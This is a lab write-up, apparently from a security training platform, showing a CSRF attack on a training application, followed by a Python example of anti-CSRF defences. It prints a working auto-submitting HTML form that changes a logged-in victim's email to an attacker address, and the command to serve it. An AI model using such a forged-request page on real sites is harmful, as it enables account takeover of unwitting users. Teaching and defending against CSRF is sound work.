Cross-Site Request Forgery (CSRF or XSRF)

Navigate to http://xss.htb.net and log in to the application using the credentials below:

  • Email: crazygorilla983

  • Password: pisces

This is an account that we created to look at the functionality of the application.

Run Burp Suite as follows.

eldeim@htb[/htb]$ burpsuite

Activate Burp Suite's proxy (Intercept On) and configure your browser to go through it.

Now, click on "Save."

You should see the below.

We notice no anti-CSRF token in the update-profile request. Let's try executing a CSRF attack against our account (Ela Stienen) that will change her profile details by simply visiting another website (while logged in to the target application).

First, create and serve the HTML page below. Save it as notmalicious.html.

<html>
  <body>
    <form id="submitMe" action="http://xss.htb.net/api/update-profile" method="POST">
      <input type="hidden" name="email" value="attacker@htb.net" />
      <input type="hidden" name="telephone" value="&#40;227&#41;&#45;750&#45;8112" />
      <input type="hidden" name="country" value="CSRF_POC" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.getElementById("submitMe").submit()
    </script>
  </body>
</html>

If you are wondering how we ended up with the above form, please see the image below.

We can serve the page above from our attacking machine as follows.

eldeim@htb[/htb]$ python -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...

No need for a proxy at this time, so don't make your browser go through Burp Suite. Restore the browser's original proxy settings.

While still logged in as Ela Stienen, open a new tab and visit the page you are serving from your attacking machine at http://<VPN/TUN Adapter IP>:1337/notmalicious.html. You will notice that Ela Stienen's profile details change to the ones we specified in the HTML page we are serving, because the browser attached her session cookie to the cross-site POST and the application had no anti-CSRF token to tell that request apart from a legitimate one.
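To make the defensive side of this concrete, the following is an added example (not code from the HTB module or from the target application) of the check the update-profile endpoint was missing: a synchronizer token bound to the session, an Origin/Referer comparison against the application's own origin, and a SameSite cookie attribute as defence in depth. The function names (start_session, is_request_allowed, session_cookie_header), the in-memory session store, the Request class and the constructed requests are all hypothetical; only http://xss.htb.net and the form field values come from the page.

```python
"""
Added example: a minimal anti-CSRF check for a state-changing endpoint,
run against two constructed requests: a legitimate profile update and the
auto-submitted form from notmalicious.html. Not part of the original page.
"""
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import urlsplit

APP_ORIGIN = "http://xss.htb.net"  # origin the application is served from (from the page)

# Hypothetical in-memory session store: session id -> CSRF token issued to that session
SESSIONS: dict[str, str] = {}


def start_session() -> str:
    """Create a session and issue a random per-session CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the application embeds as a hidden field in its own profile form."""
    return SESSIONS[sid]


@dataclass
class Request:
    method: str
    headers: dict   # e.g. {"Origin": "..."}
    cookies: dict   # e.g. {"session": "..."}
    form: dict      # decoded POST body


def is_request_allowed(req: Request) -> tuple[bool, str]:
    """Return (allowed, reason). Safe methods pass; state changes need session + token."""
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    sid = req.cookies.get("session")
    if sid not in SESSIONS:
        return False, "no valid session"
    # 1. Origin/Referer check: browsers attach Origin on cross-site form POSTs,
    #    so a mismatch already identifies the forged request.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source is not None:
        src, app = urlsplit(source), urlsplit(APP_ORIGIN)
        if (src.scheme, src.netloc) != (app.scheme, app.netloc):
            return False, f"cross-origin request from {src.scheme}://{src.netloc}"
    # 2. Synchronizer token: the form must carry the token issued to this session.
    #    A page on another origin cannot read it, so it cannot forge it.
    submitted = req.form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), SESSIONS[sid].encode()):
        return False, "missing or wrong anti-CSRF token"
    return True, "ok"


def session_cookie_header(sid: str) -> str:
    """SameSite=Lax stops the browser sending the cookie with a cross-site POST at all."""
    return f"Set-Cookie: session={sid}; HttpOnly; SameSite=Lax; Path=/"


def demo() -> tuple[tuple[bool, str], tuple[bool, str]]:
    """Run both constructed requests through the check."""
    sid = start_session()
    # Legitimate update submitted from the application's own profile page
    legit = Request("POST", {"Origin": APP_ORIGIN}, {"session": sid},
                    {"email": "crazygorilla983", "country": "HTB",
                     "csrf_token": csrf_token_for(sid)})
    # The form from notmalicious.html: the session cookie is sent, but the body has
    # no token and the browser sets Origin to the attacker-controlled host (constructed)
    forged = Request("POST", {"Origin": "http://attacker.example:1337"}, {"session": sid},
                     {"email": "attacker@htb.net", "telephone": "(227)-750-8112",
                      "country": "CSRF_POC"})
    return is_request_allowed(legit), is_request_allowed(forged)


if __name__ == "__main__":
    legit_result, forged_result = demo()
    print("legitimate update:", legit_result)
    print("forged update:    ", forged_result)
```

The two checks are independent on purpose: the token check is what actually closes the hole described on this page, while the Origin comparison and the SameSite attribute catch the forged POST even if a template somewhere forgets to include the hidden token field.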
